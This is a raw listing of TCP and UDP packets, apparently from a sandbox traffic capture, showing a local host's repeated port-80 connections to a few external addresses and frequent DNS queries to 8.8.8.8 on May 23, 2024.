May 23, 2024 20:18:59.576844931 CEST	80	49241	188.114.97.3	192.168.2.22
May 23, 2024 20:19:00.269442081 CEST	80	49241	188.114.97.3	192.168.2.22
May 23, 2024 20:19:00.269686937 CEST	49241	80	192.168.2.22	188.114.97.3
May 23, 2024 20:19:00.274427891 CEST	80	49241	188.114.97.3	192.168.2.22
May 23, 2024 20:19:00.274508953 CEST	49241	80	192.168.2.22	188.114.97.3
May 23, 2024 20:19:00.323208094 CEST	80	49241	188.114.97.3	192.168.2.22
May 23, 2024 20:19:00.418389082 CEST	49242	80	192.168.2.22	188.114.96.3
May 23, 2024 20:19:00.427321911 CEST	80	49242	188.114.96.3	192.168.2.22
May 23, 2024 20:19:00.427417040 CEST	49242	80	192.168.2.22	188.114.96.3
May 23, 2024 20:19:00.429820061 CEST	49242	80	192.168.2.22	188.114.96.3
May 23, 2024 20:19:00.479665995 CEST	80	49242	188.114.96.3	192.168.2.22
May 23, 2024 20:19:00.479760885 CEST	49242	80	192.168.2.22	188.114.96.3
May 23, 2024 20:19:00.484937906 CEST	80	49242	188.114.96.3	192.168.2.22
May 23, 2024 20:19:01.175054073 CEST	80	49242	188.114.96.3	192.168.2.22
May 23, 2024 20:19:01.175309896 CEST	49242	80	192.168.2.22	188.114.96.3
May 23, 2024 20:19:01.179840088 CEST	80	49242	188.114.96.3	192.168.2.22
May 23, 2024 20:19:01.179907084 CEST	49242	80	192.168.2.22	188.114.96.3
May 23, 2024 20:19:01.227468014 CEST	80	49242	188.114.96.3	192.168.2.22
May 23, 2024 20:19:01.357825041 CEST	49243	80	192.168.2.22	188.114.96.3
May 23, 2024 20:19:01.363159895 CEST	80	49243	188.114.96.3	192.168.2.22
May 23, 2024 20:19:01.363224030 CEST	49243	80	192.168.2.22	188.114.96.3
May 23, 2024 20:19:01.377448082 CEST	49243	80	192.168.2.22	188.114.96.3
May 23, 2024 20:19:01.652060986 CEST	80	49243	188.114.96.3	192.168.2.22
May 23, 2024 20:19:01.652162075 CEST	49243	80	192.168.2.22	188.114.96.3
May 23, 2024 20:19:01.657288074 CEST	80	49243	188.114.96.3	192.168.2.22
May 23, 2024 20:19:02.025820017 CEST	80	49243	188.114.96.3	192.168.2.22
May 23, 2024 20:19:02.025917053 CEST	49243	80	192.168.2.22	188.114.96.3
May 23, 2024 20:19:02.034584045 CEST	80	49243	188.114.96.3	192.168.2.22
May 23, 2024 20:19:02.034636974 CEST	49243	80	192.168.2.22	188.114.96.3
May 23, 2024 20:19:02.079386950 CEST	80	49243	188.114.96.3	192.168.2.22
May 23, 2024 20:19:02.177350044 CEST	49244	80	192.168.2.22	188.114.96.9
May 23, 2024 20:19:02.182385921 CEST	80	49244	188.114.96.9	192.168.2.22
May 23, 2024 20:19:02.182454109 CEST	49244	80	192.168.2.22	188.114.96.9
May 23, 2024 20:19:02.183840990 CEST	49244	80	192.168.2.22	188.114.96.9
May 23, 2024 20:19:02.235354900 CEST	80	49244	188.114.96.9	192.168.2.22
May 23, 2024 20:19:02.235493898 CEST	49244	80	192.168.2.22	188.114.96.9
May 23, 2024 20:19:02.240453005 CEST	80	49244	188.114.96.9	192.168.2.22
May 23, 2024 20:19:02.953495026 CEST	80	49244	188.114.96.9	192.168.2.22
May 23, 2024 20:19:02.958314896 CEST	80	49244	188.114.96.9	192.168.2.22
May 23, 2024 20:19:02.958436012 CEST	49244	80	192.168.2.22	188.114.96.9
May 23, 2024 20:19:03.001190901 CEST	49244	80	192.168.2.22	188.114.96.9
May 23, 2024 20:19:03.011284113 CEST	80	49244	188.114.96.9	192.168.2.22
May 23, 2024 20:19:03.310264111 CEST	49245	80	192.168.2.22	188.114.97.3
May 23, 2024 20:19:03.315212011 CEST	80	49245	188.114.97.3	192.168.2.22
May 23, 2024 20:19:03.315337896 CEST	49245	80	192.168.2.22	188.114.97.3
May 23, 2024 20:19:03.316992998 CEST	49245	80	192.168.2.22	188.114.97.3
May 23, 2024 20:19:03.367569923 CEST	80	49245	188.114.97.3	192.168.2.22
May 23, 2024 20:19:03.367819071 CEST	49245	80	192.168.2.22	188.114.97.3
May 23, 2024 20:19:03.372853041 CEST	80	49245	188.114.97.3	192.168.2.22
May 23, 2024 20:19:04.069135904 CEST	80	49245	188.114.97.3	192.168.2.22
May 23, 2024 20:19:04.069259882 CEST	49245	80	192.168.2.22	188.114.97.3
May 23, 2024 20:19:04.073656082 CEST	80	49245	188.114.97.3	192.168.2.22
May 23, 2024 20:19:04.073774099 CEST	49245	80	192.168.2.22	188.114.97.3
May 23, 2024 20:19:04.123272896 CEST	80	49245	188.114.97.3	192.168.2.22
May 23, 2024 20:19:04.219999075 CEST	49246	80	192.168.2.22	188.114.96.9
May 23, 2024 20:19:04.225052118 CEST	80	49246	188.114.96.9	192.168.2.22
May 23, 2024 20:19:04.225152969 CEST	49246	80	192.168.2.22	188.114.96.9
May 23, 2024 20:19:04.226887941 CEST	49246	80	192.168.2.22	188.114.96.9
May 23, 2024 20:19:04.275475025 CEST	80	49246	188.114.96.9	192.168.2.22
May 23, 2024 20:19:04.275613070 CEST	49246	80	192.168.2.22	188.114.96.9
May 23, 2024 20:19:04.280894995 CEST	80	49246	188.114.96.9	192.168.2.22
May 23, 2024 20:19:04.961457014 CEST	80	49246	188.114.96.9	192.168.2.22
May 23, 2024 20:19:04.961582899 CEST	49246	80	192.168.2.22	188.114.96.9
May 23, 2024 20:19:04.966217041 CEST	80	49246	188.114.96.9	192.168.2.22
May 23, 2024 20:19:04.966262102 CEST	49246	80	192.168.2.22	188.114.96.9
May 23, 2024 20:19:05.011334896 CEST	80	49246	188.114.96.9	192.168.2.22
May 23, 2024 20:19:05.126034021 CEST	49247	80	192.168.2.22	188.114.97.9
May 23, 2024 20:19:05.133310080 CEST	80	49247	188.114.97.9	192.168.2.22
May 23, 2024 20:19:05.133392096 CEST	49247	80	192.168.2.22	188.114.97.9
May 23, 2024 20:19:05.135746956 CEST	49247	80	192.168.2.22	188.114.97.9
May 23, 2024 20:19:05.183386087 CEST	80	49247	188.114.97.9	192.168.2.22
May 23, 2024 20:19:05.183686018 CEST	49247	80	192.168.2.22	188.114.97.9
May 23, 2024 20:19:05.189312935 CEST	80	49247	188.114.97.9	192.168.2.22
May 23, 2024 20:19:05.905803919 CEST	80	49247	188.114.97.9	192.168.2.22
May 23, 2024 20:19:05.906092882 CEST	49247	80	192.168.2.22	188.114.97.9
May 23, 2024 20:19:05.911153078 CEST	80	49247	188.114.97.9	192.168.2.22
May 23, 2024 20:19:05.911237001 CEST	49247	80	192.168.2.22	188.114.97.9
May 23, 2024 20:19:05.959333897 CEST	80	49247	188.114.97.9	192.168.2.22
May 23, 2024 20:19:06.057806969 CEST	49248	80	192.168.2.22	188.114.96.3
May 23, 2024 20:19:06.062799931 CEST	80	49248	188.114.96.3	192.168.2.22
May 23, 2024 20:19:06.062882900 CEST	49248	80	192.168.2.22	188.114.96.3
May 23, 2024 20:19:06.064260960 CEST	49248	80	192.168.2.22	188.114.96.3
May 23, 2024 20:19:06.120667934 CEST	80	49248	188.114.96.3	192.168.2.22
May 23, 2024 20:19:06.120733023 CEST	49248	80	192.168.2.22	188.114.96.3
May 23, 2024 20:19:06.125852108 CEST	80	49248	188.114.96.3	192.168.2.22
May 23, 2024 20:19:06.849389076 CEST	80	49248	188.114.96.3	192.168.2.22
May 23, 2024 20:19:06.849544048 CEST	49248	80	192.168.2.22	188.114.96.3
May 23, 2024 20:19:06.854063988 CEST	80	49248	188.114.96.3	192.168.2.22
May 23, 2024 20:19:06.854185104 CEST	49248	80	192.168.2.22	188.114.96.3
May 23, 2024 20:19:06.860692024 CEST	80	49248	188.114.96.3	192.168.2.22
May 23, 2024 20:19:07.011852026 CEST	49249	80	192.168.2.22	188.114.96.3
May 23, 2024 20:19:07.017843008 CEST	80	49249	188.114.96.3	192.168.2.22
May 23, 2024 20:19:07.017924070 CEST	49249	80	192.168.2.22	188.114.96.3
May 23, 2024 20:19:07.020534992 CEST	49249	80	192.168.2.22	188.114.96.3
May 23, 2024 20:19:07.073508024 CEST	80	49249	188.114.96.3	192.168.2.22
May 23, 2024 20:19:07.073698044 CEST	49249	80	192.168.2.22	188.114.96.3
May 23, 2024 20:19:07.078893900 CEST	80	49249	188.114.96.3	192.168.2.22
May 23, 2024 20:19:07.735543013 CEST	80	49249	188.114.96.3	192.168.2.22
May 23, 2024 20:19:07.735789061 CEST	49249	80	192.168.2.22	188.114.96.3
May 23, 2024 20:19:07.740360022 CEST	80	49249	188.114.96.3	192.168.2.22
May 23, 2024 20:19:07.740438938 CEST	49249	80	192.168.2.22	188.114.96.3
May 23, 2024 20:19:07.787765980 CEST	80	49249	188.114.96.3	192.168.2.22
May 23, 2024 20:19:07.882328033 CEST	49250	80	192.168.2.22	188.114.96.3
May 23, 2024 20:19:07.887296915 CEST	80	49250	188.114.96.3	192.168.2.22
May 23, 2024 20:19:07.887358904 CEST	49250	80	192.168.2.22	188.114.96.3
May 23, 2024 20:19:07.888746023 CEST	49250	80	192.168.2.22	188.114.96.3
May 23, 2024 20:19:07.942214966 CEST	80	49250	188.114.96.3	192.168.2.22
May 23, 2024 20:19:07.942332029 CEST	49250	80	192.168.2.22	188.114.96.3
May 23, 2024 20:19:07.947321892 CEST	80	49250	188.114.96.3	192.168.2.22
May 23, 2024 20:19:08.665510893 CEST	80	49250	188.114.96.3	192.168.2.22
May 23, 2024 20:19:08.665812969 CEST	49250	80	192.168.2.22	188.114.96.3
May 23, 2024 20:19:08.670257092 CEST	80	49250	188.114.96.3	192.168.2.22
May 23, 2024 20:19:08.670335054 CEST	49250	80	192.168.2.22	188.114.96.3
May 23, 2024 20:19:08.675928116 CEST	80	49250	188.114.96.3	192.168.2.22
May 23, 2024 20:19:08.846906900 CEST	49251	80	192.168.2.22	188.114.96.3
May 23, 2024 20:19:08.852329016 CEST	80	49251	188.114.96.3	192.168.2.22
May 23, 2024 20:19:08.852416992 CEST	49251	80	192.168.2.22	188.114.96.3
May 23, 2024 20:19:08.863871098 CEST	49251	80	192.168.2.22	188.114.96.3
May 23, 2024 20:19:08.907336950 CEST	80	49251	188.114.96.3	192.168.2.22
May 23, 2024 20:19:08.907586098 CEST	49251	80	192.168.2.22	188.114.96.3
May 23, 2024 20:19:08.913291931 CEST	80	49251	188.114.96.3	192.168.2.22
May 23, 2024 20:19:09.611733913 CEST	80	49251	188.114.96.3	192.168.2.22
May 23, 2024 20:19:09.613095999 CEST	49251	80	192.168.2.22	188.114.96.3
May 23, 2024 20:19:09.616430044 CEST	80	49251	188.114.96.3	192.168.2.22
May 23, 2024 20:19:09.616514921 CEST	49251	80	192.168.2.22	188.114.96.3
May 23, 2024 20:19:09.663424015 CEST	80	49251	188.114.96.3	192.168.2.22
May 23, 2024 20:19:09.934326887 CEST	49252	80	192.168.2.22	188.114.96.3
May 23, 2024 20:19:09.942114115 CEST	80	49252	188.114.96.3	192.168.2.22
May 23, 2024 20:19:09.942187071 CEST	49252	80	192.168.2.22	188.114.96.3
May 23, 2024 20:19:09.943896055 CEST	49252	80	192.168.2.22	188.114.96.3
May 23, 2024 20:19:09.995361090 CEST	80	49252	188.114.96.3	192.168.2.22
May 23, 2024 20:19:09.995471954 CEST	49252	80	192.168.2.22	188.114.96.3
May 23, 2024 20:19:10.003531933 CEST	80	49252	188.114.96.3	192.168.2.22
May 23, 2024 20:19:10.580454111 CEST	80	49252	188.114.96.3	192.168.2.22
May 23, 2024 20:19:10.580637932 CEST	49252	80	192.168.2.22	188.114.96.3
May 23, 2024 20:19:10.585222006 CEST	80	49252	188.114.96.3	192.168.2.22
May 23, 2024 20:19:10.585335970 CEST	49252	80	192.168.2.22	188.114.96.3
May 23, 2024 20:19:10.593084097 CEST	80	49252	188.114.96.3	192.168.2.22
May 23, 2024 20:19:10.733789921 CEST	49253	80	192.168.2.22	188.114.97.3
May 23, 2024 20:19:10.738866091 CEST	80	49253	188.114.97.3	192.168.2.22
May 23, 2024 20:19:10.738944054 CEST	49253	80	192.168.2.22	188.114.97.3
May 23, 2024 20:19:10.741295099 CEST	49253	80	192.168.2.22	188.114.97.3
May 23, 2024 20:19:10.804503918 CEST	80	49253	188.114.97.3	192.168.2.22
May 23, 2024 20:19:10.804636955 CEST	49253	80	192.168.2.22	188.114.97.3
May 23, 2024 20:19:10.855389118 CEST	80	49253	188.114.97.3	192.168.2.22
May 23, 2024 20:19:11.511003971 CEST	80	49253	188.114.97.3	192.168.2.22
May 23, 2024 20:19:11.511153936 CEST	49253	80	192.168.2.22	188.114.97.3
May 23, 2024 20:19:11.515736103 CEST	80	49253	188.114.97.3	192.168.2.22
May 23, 2024 20:19:11.515921116 CEST	49253	80	192.168.2.22	188.114.97.3
May 23, 2024 20:19:11.563514948 CEST	80	49253	188.114.97.3	192.168.2.22
May 23, 2024 20:19:11.669047117 CEST	49254	80	192.168.2.22	188.114.96.9
May 23, 2024 20:19:11.674108028 CEST	80	49254	188.114.96.9	192.168.2.22
May 23, 2024 20:19:11.674174070 CEST	49254	80	192.168.2.22	188.114.96.9
May 23, 2024 20:19:11.675766945 CEST	49254	80	192.168.2.22	188.114.96.9
May 23, 2024 20:19:11.727400064 CEST	80	49254	188.114.96.9	192.168.2.22
May 23, 2024 20:19:11.727550030 CEST	49254	80	192.168.2.22	188.114.96.9
May 23, 2024 20:19:11.732546091 CEST	80	49254	188.114.96.9	192.168.2.22
May 23, 2024 20:19:12.451481104 CEST	80	49254	188.114.96.9	192.168.2.22
May 23, 2024 20:19:12.451514006 CEST	80	49254	188.114.96.9	192.168.2.22
May 23, 2024 20:19:12.451539993 CEST	80	49254	188.114.96.9	192.168.2.22
May 23, 2024 20:19:12.451611042 CEST	49254	80	192.168.2.22	188.114.96.9
May 23, 2024 20:19:12.451690912 CEST	49254	80	192.168.2.22	188.114.96.9
May 23, 2024 20:19:12.451690912 CEST	49254	80	192.168.2.22	188.114.96.9
May 23, 2024 20:19:12.460077047 CEST	80	49254	188.114.96.9	192.168.2.22
May 23, 2024 20:19:12.590276957 CEST	49255	80	192.168.2.22	188.114.96.3
May 23, 2024 20:19:12.595376015 CEST	80	49255	188.114.96.3	192.168.2.22
May 23, 2024 20:19:12.595508099 CEST	49255	80	192.168.2.22	188.114.96.3
May 23, 2024 20:19:12.597934008 CEST	49255	80	192.168.2.22	188.114.96.3
May 23, 2024 20:19:12.651973963 CEST	80	49255	188.114.96.3	192.168.2.22
May 23, 2024 20:19:12.652106047 CEST	49255	80	192.168.2.22	188.114.96.3
May 23, 2024 20:19:12.657162905 CEST	80	49255	188.114.96.3	192.168.2.22
May 23, 2024 20:19:13.233325958 CEST	80	49255	188.114.96.3	192.168.2.22
May 23, 2024 20:19:13.233449936 CEST	49255	80	192.168.2.22	188.114.96.3
May 23, 2024 20:19:13.238015890 CEST	80	49255	188.114.96.3	192.168.2.22
May 23, 2024 20:19:13.238086939 CEST	49255	80	192.168.2.22	188.114.96.3
May 23, 2024 20:19:13.243040085 CEST	80	49255	188.114.96.3	192.168.2.22
May 23, 2024 20:19:13.392312050 CEST	49256	80	192.168.2.22	188.114.97.3
May 23, 2024 20:19:13.397459030 CEST	80	49256	188.114.97.3	192.168.2.22
May 23, 2024 20:19:13.397530079 CEST	49256	80	192.168.2.22	188.114.97.3
May 23, 2024 20:19:13.398916960 CEST	49256	80	192.168.2.22	188.114.97.3
May 23, 2024 20:19:13.447361946 CEST	80	49256	188.114.97.3	192.168.2.22
May 23, 2024 20:19:13.447422981 CEST	49256	80	192.168.2.22	188.114.97.3
May 23, 2024 20:19:13.453330994 CEST	80	49256	188.114.97.3	192.168.2.22
May 23, 2024 20:19:14.112435102 CEST	80	49256	188.114.97.3	192.168.2.22
May 23, 2024 20:19:14.112536907 CEST	49256	80	192.168.2.22	188.114.97.3
May 23, 2024 20:19:14.117161036 CEST	80	49256	188.114.97.3	192.168.2.22
May 23, 2024 20:19:14.117264986 CEST	49256	80	192.168.2.22	188.114.97.3
May 23, 2024 20:19:14.163089037 CEST	80	49256	188.114.97.3	192.168.2.22
May 23, 2024 20:19:14.270569086 CEST	49257	80	192.168.2.22	188.114.96.3
May 23, 2024 20:19:14.275605917 CEST	80	49257	188.114.96.3	192.168.2.22
May 23, 2024 20:19:14.275671959 CEST	49257	80	192.168.2.22	188.114.96.3
May 23, 2024 20:19:14.278026104 CEST	49257	80	192.168.2.22	188.114.96.3
May 23, 2024 20:19:14.327255011 CEST	80	49257	188.114.96.3	192.168.2.22
May 23, 2024 20:19:14.327351093 CEST	49257	80	192.168.2.22	188.114.96.3
May 23, 2024 20:19:14.332542896 CEST	80	49257	188.114.96.3	192.168.2.22
May 23, 2024 20:19:14.904860973 CEST	80	49257	188.114.96.3	192.168.2.22
May 23, 2024 20:19:14.909537077 CEST	80	49257	188.114.96.3	192.168.2.22
May 23, 2024 20:19:14.909733057 CEST	49257	80	192.168.2.22	188.114.96.3
May 23, 2024 20:19:14.998275995 CEST	49257	80	192.168.2.22	188.114.96.3
May 23, 2024 20:19:15.003278971 CEST	80	49257	188.114.96.3	192.168.2.22
May 23, 2024 20:19:15.177755117 CEST	49258	80	192.168.2.22	188.114.96.3
May 23, 2024 20:19:15.182832956 CEST	80	49258	188.114.96.3	192.168.2.22
May 23, 2024 20:19:15.183038950 CEST	49258	80	192.168.2.22	188.114.96.3
May 23, 2024 20:19:15.184596062 CEST	49258	80	192.168.2.22	188.114.96.3
May 23, 2024 20:19:15.236504078 CEST	80	49258	188.114.96.3	192.168.2.22
May 23, 2024 20:19:15.236584902 CEST	49258	80	192.168.2.22	188.114.96.3
May 23, 2024 20:19:15.244792938 CEST	80	49258	188.114.96.3	192.168.2.22
May 23, 2024 20:19:15.842974901 CEST	80	49258	188.114.96.3	192.168.2.22
May 23, 2024 20:19:15.843202114 CEST	49258	80	192.168.2.22	188.114.96.3
May 23, 2024 20:19:15.847676039 CEST	80	49258	188.114.96.3	192.168.2.22
May 23, 2024 20:19:15.847729921 CEST	49258	80	192.168.2.22	188.114.96.3
May 23, 2024 20:19:15.895241976 CEST	80	49258	188.114.96.3	192.168.2.22
May 23, 2024 20:19:15.999243021 CEST	49259	80	192.168.2.22	188.114.97.3
May 23, 2024 20:19:16.004223108 CEST	80	49259	188.114.97.3	192.168.2.22
May 23, 2024 20:19:16.004283905 CEST	49259	80	192.168.2.22	188.114.97.3
May 23, 2024 20:19:16.005968094 CEST	49259	80	192.168.2.22	188.114.97.3
May 23, 2024 20:19:16.055294037 CEST	80	49259	188.114.97.3	192.168.2.22
May 23, 2024 20:19:16.055433035 CEST	49259	80	192.168.2.22	188.114.97.3
May 23, 2024 20:19:16.060416937 CEST	80	49259	188.114.97.3	192.168.2.22
May 23, 2024 20:19:16.725969076 CEST	80	49259	188.114.97.3	192.168.2.22
May 23, 2024 20:19:16.726129055 CEST	49259	80	192.168.2.22	188.114.97.3
May 23, 2024 20:19:16.732117891 CEST	80	49259	188.114.97.3	192.168.2.22
May 23, 2024 20:19:16.732217073 CEST	49259	80	192.168.2.22	188.114.97.3
May 23, 2024 20:19:16.779182911 CEST	80	49259	188.114.97.3	192.168.2.22
May 23, 2024 20:19:16.874466896 CEST	49260	80	192.168.2.22	188.114.96.3
May 23, 2024 20:19:16.879641056 CEST	80	49260	188.114.96.3	192.168.2.22
May 23, 2024 20:19:16.879726887 CEST	49260	80	192.168.2.22	188.114.96.3
May 23, 2024 20:19:16.882044077 CEST	49260	80	192.168.2.22	188.114.96.3
May 23, 2024 20:19:16.932055950 CEST	80	49260	188.114.96.3	192.168.2.22
May 23, 2024 20:19:16.932179928 CEST	49260	80	192.168.2.22	188.114.96.3
May 23, 2024 20:19:16.942044020 CEST	80	49260	188.114.96.3	192.168.2.22
May 23, 2024 20:19:17.508523941 CEST	80	49260	188.114.96.3	192.168.2.22
May 23, 2024 20:19:17.508900881 CEST	49260	80	192.168.2.22	188.114.96.3
May 23, 2024 20:19:17.513153076 CEST	80	49260	188.114.96.3	192.168.2.22
May 23, 2024 20:19:17.513211012 CEST	49260	80	192.168.2.22	188.114.96.3
May 23, 2024 20:19:17.559726000 CEST	80	49260	188.114.96.3	192.168.2.22
May 23, 2024 20:19:17.645674944 CEST	49261	80	192.168.2.22	188.114.96.3
May 23, 2024 20:19:17.651544094 CEST	80	49261	188.114.96.3	192.168.2.22
May 23, 2024 20:19:17.651593924 CEST	49261	80	192.168.2.22	188.114.96.3
May 23, 2024 20:19:17.653378963 CEST	49261	80	192.168.2.22	188.114.96.3
May 23, 2024 20:19:17.709343910 CEST	80	49261	188.114.96.3	192.168.2.22
May 23, 2024 20:19:17.709537983 CEST	49261	80	192.168.2.22	188.114.96.3
May 23, 2024 20:19:17.714663029 CEST	80	49261	188.114.96.3	192.168.2.22
May 23, 2024 20:19:18.284159899 CEST	80	49261	188.114.96.3	192.168.2.22
May 23, 2024 20:19:18.284281969 CEST	49261	80	192.168.2.22	188.114.96.3
May 23, 2024 20:19:18.291275978 CEST	80	49261	188.114.96.3	192.168.2.22
May 23, 2024 20:19:18.291353941 CEST	49261	80	192.168.2.22	188.114.96.3
May 23, 2024 20:19:18.339612007 CEST	80	49261	188.114.96.3	192.168.2.22
May 23, 2024 20:19:18.432854891 CEST	49262	80	192.168.2.22	188.114.96.3
May 23, 2024 20:19:18.439290047 CEST	80	49262	188.114.96.3	192.168.2.22
May 23, 2024 20:19:18.439377069 CEST	49262	80	192.168.2.22	188.114.96.3
May 23, 2024 20:19:18.441020966 CEST	49262	80	192.168.2.22	188.114.96.3
May 23, 2024 20:19:18.492142916 CEST	80	49262	188.114.96.3	192.168.2.22
May 23, 2024 20:19:18.492275000 CEST	49262	80	192.168.2.22	188.114.96.3
May 23, 2024 20:19:18.499218941 CEST	80	49262	188.114.96.3	192.168.2.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 23, 2024 20:17:25.248487949 CEST	54562	53	192.168.2.22	8.8.8.8
May 23, 2024 20:17:25.261668921 CEST	53	54562	8.8.8.8	192.168.2.22
May 23, 2024 20:17:35.013319016 CEST	52917	53	192.168.2.22	8.8.8.8
May 23, 2024 20:17:35.106868029 CEST	53	52917	8.8.8.8	192.168.2.22
May 23, 2024 20:17:36.471962929 CEST	62751	53	192.168.2.22	8.8.8.8
May 23, 2024 20:17:36.575613022 CEST	53	62751	8.8.8.8	192.168.2.22
May 23, 2024 20:17:37.973797083 CEST	57893	53	192.168.2.22	8.8.8.8
May 23, 2024 20:17:38.070122957 CEST	53	57893	8.8.8.8	192.168.2.22
May 23, 2024 20:17:39.389893055 CEST	54821	53	192.168.2.22	8.8.8.8
May 23, 2024 20:17:39.396862984 CEST	53	54821	8.8.8.8	192.168.2.22
May 23, 2024 20:17:40.787965059 CEST	54719	53	192.168.2.22	8.8.8.8
May 23, 2024 20:17:40.795311928 CEST	53	54719	8.8.8.8	192.168.2.22
May 23, 2024 20:17:41.812153101 CEST	49881	53	192.168.2.22	8.8.8.8
May 23, 2024 20:17:42.108488083 CEST	53	49881	8.8.8.8	192.168.2.22
May 23, 2024 20:17:43.075829983 CEST	54998	53	192.168.2.22	8.8.8.8
May 23, 2024 20:17:43.175477982 CEST	53	54998	8.8.8.8	192.168.2.22
May 23, 2024 20:17:44.091836929 CEST	52781	53	192.168.2.22	8.8.8.8
May 23, 2024 20:17:44.099220991 CEST	53	52781	8.8.8.8	192.168.2.22
May 23, 2024 20:17:45.054994106 CEST	63926	53	192.168.2.22	8.8.8.8
May 23, 2024 20:17:45.147840023 CEST	53	63926	8.8.8.8	192.168.2.22
May 23, 2024 20:17:46.019932032 CEST	65510	53	192.168.2.22	8.8.8.8
May 23, 2024 20:17:46.325120926 CEST	53	65510	8.8.8.8	192.168.2.22
May 23, 2024 20:17:47.193533897 CEST	62672	53	192.168.2.22	8.8.8.8
May 23, 2024 20:17:47.201168060 CEST	53	62672	8.8.8.8	192.168.2.22
May 23, 2024 20:17:48.073056936 CEST	56475	53	192.168.2.22	8.8.8.8
May 23, 2024 20:17:48.080511093 CEST	53	56475	8.8.8.8	192.168.2.22
May 23, 2024 20:17:49.040054083 CEST	49384	53	192.168.2.22	8.8.8.8
May 23, 2024 20:17:49.140233040 CEST	53	49384	8.8.8.8	192.168.2.22
May 23, 2024 20:17:50.044065952 CEST	54842	53	192.168.2.22	8.8.8.8
May 23, 2024 20:17:50.051635981 CEST	53	54842	8.8.8.8	192.168.2.22
May 23, 2024 20:17:50.930351019 CEST	58105	53	192.168.2.22	8.8.8.8
May 23, 2024 20:17:50.937587023 CEST	53	58105	8.8.8.8	192.168.2.22
May 23, 2024 20:17:51.787807941 CEST	64928	53	192.168.2.22	8.8.8.8
May 23, 2024 20:17:51.796273947 CEST	53	64928	8.8.8.8	192.168.2.22
May 23, 2024 20:17:52.681253910 CEST	57390	53	192.168.2.22	8.8.8.8
May 23, 2024 20:17:52.687720060 CEST	53	57390	8.8.8.8	192.168.2.22
May 23, 2024 20:17:53.955564022 CEST	58095	53	192.168.2.22	8.8.8.8
May 23, 2024 20:17:53.967643023 CEST	53	58095	8.8.8.8	192.168.2.22
May 23, 2024 20:17:56.032198906 CEST	54261	53	192.168.2.22	8.8.8.8
May 23, 2024 20:17:56.039443970 CEST	53	54261	8.8.8.8	192.168.2.22
May 23, 2024 20:17:56.963481903 CEST	60507	53	192.168.2.22	8.8.8.8
May 23, 2024 20:17:56.970849037 CEST	53	60507	8.8.8.8	192.168.2.22
May 23, 2024 20:17:57.904227018 CEST	50446	53	192.168.2.22	8.8.8.8
May 23, 2024 20:17:57.912106991 CEST	53	50446	8.8.8.8	192.168.2.22
May 23, 2024 20:17:58.806338072 CEST	55939	53	192.168.2.22	8.8.8.8
May 23, 2024 20:17:58.813364029 CEST	53	55939	8.8.8.8	192.168.2.22
May 23, 2024 20:17:59.746988058 CEST	49608	53	192.168.2.22	8.8.8.8
May 23, 2024 20:17:59.754622936 CEST	53	49608	8.8.8.8	192.168.2.22
May 23, 2024 20:18:00.717585087 CEST	61486	53	192.168.2.22	8.8.8.8
May 23, 2024 20:18:00.729857922 CEST	53	61486	8.8.8.8	192.168.2.22
May 23, 2024 20:18:01.529481888 CEST	62453	53	192.168.2.22	8.8.8.8
May 23, 2024 20:18:01.547060966 CEST	53	62453	8.8.8.8	192.168.2.22
May 23, 2024 20:18:02.352221966 CEST	50568	53	192.168.2.22	8.8.8.8
May 23, 2024 20:18:02.361994028 CEST	53	50568	8.8.8.8	192.168.2.22
May 23, 2024 20:18:03.263438940 CEST	61467	53	192.168.2.22	8.8.8.8
May 23, 2024 20:18:03.271300077 CEST	53	61467	8.8.8.8	192.168.2.22
May 23, 2024 20:18:04.145406961 CEST	61618	53	192.168.2.22	8.8.8.8
May 23, 2024 20:18:04.162955999 CEST	53	61618	8.8.8.8	192.168.2.22
May 23, 2024 20:18:06.025861979 CEST	54422	53	192.168.2.22	8.8.8.8
May 23, 2024 20:18:06.036633968 CEST	53	54422	8.8.8.8	192.168.2.22
May 23, 2024 20:18:07.059591055 CEST	52074	53	192.168.2.22	8.8.8.8
May 23, 2024 20:18:07.067257881 CEST	53	52074	8.8.8.8	192.168.2.22
May 23, 2024 20:18:07.975244045 CEST	50337	53	192.168.2.22	8.8.8.8
May 23, 2024 20:18:07.982644081 CEST	53	50337	8.8.8.8	192.168.2.22
May 23, 2024 20:18:08.933924913 CEST	61826	53	192.168.2.22	8.8.8.8
May 23, 2024 20:18:08.941198111 CEST	53	61826	8.8.8.8	192.168.2.22
May 23, 2024 20:18:09.836658001 CEST	56329	53	192.168.2.22	8.8.8.8
May 23, 2024 20:18:09.852065086 CEST	53	56329	8.8.8.8	192.168.2.22
May 23, 2024 20:18:10.664048910 CEST	63469	53	192.168.2.22	8.8.8.8
May 23, 2024 20:18:10.671595097 CEST	53	63469	8.8.8.8	192.168.2.22
May 23, 2024 20:18:11.700437069 CEST	59447	53	192.168.2.22	8.8.8.8
May 23, 2024 20:18:11.707437992 CEST	53	59447	8.8.8.8	192.168.2.22
May 23, 2024 20:18:16.256679058 CEST	51828	53	192.168.2.22	8.8.8.8
May 23, 2024 20:18:16.263711929 CEST	53	51828	8.8.8.8	192.168.2.22
May 23, 2024 20:18:17.142232895 CEST	53406	53	192.168.2.22	8.8.8.8
May 23, 2024 20:18:17.149425030 CEST	53	53406	8.8.8.8	192.168.2.22
May 23, 2024 20:18:18.062695980 CEST	56345	53	192.168.2.22	8.8.8.8
May 23, 2024 20:18:18.070195913 CEST	53	56345	8.8.8.8	192.168.2.22
May 23, 2024 20:18:18.956516027 CEST	51870	53	192.168.2.22	8.8.8.8
May 23, 2024 20:18:18.964488983 CEST	53	51870	8.8.8.8	192.168.2.22
May 23, 2024 20:18:19.968893051 CEST	65009	53	192.168.2.22	8.8.8.8
May 23, 2024 20:18:19.979517937 CEST	53	65009	8.8.8.8	192.168.2.22
May 23, 2024 20:18:20.867146969 CEST	64956	53	192.168.2.22	8.8.8.8
May 23, 2024 20:18:20.875355959 CEST	53	64956	8.8.8.8	192.168.2.22
May 23, 2024 20:18:21.821590900 CEST	54521	53	192.168.2.22	8.8.8.8
May 23, 2024 20:18:21.829258919 CEST	53	54521	8.8.8.8	192.168.2.22
May 23, 2024 20:18:22.757569075 CEST	49750	53	192.168.2.22	8.8.8.8
May 23, 2024 20:18:22.764985085 CEST	53	49750	8.8.8.8	192.168.2.22
May 23, 2024 20:18:23.657824039 CEST	64687	53	192.168.2.22	8.8.8.8
May 23, 2024 20:18:23.666145086 CEST	53	64687	8.8.8.8	192.168.2.22
May 23, 2024 20:18:24.550265074 CEST	65084	53	192.168.2.22	8.8.8.8
May 23, 2024 20:18:24.557745934 CEST	53	65084	8.8.8.8	192.168.2.22
May 23, 2024 20:18:25.467520952 CEST	63373	53	192.168.2.22	8.8.8.8
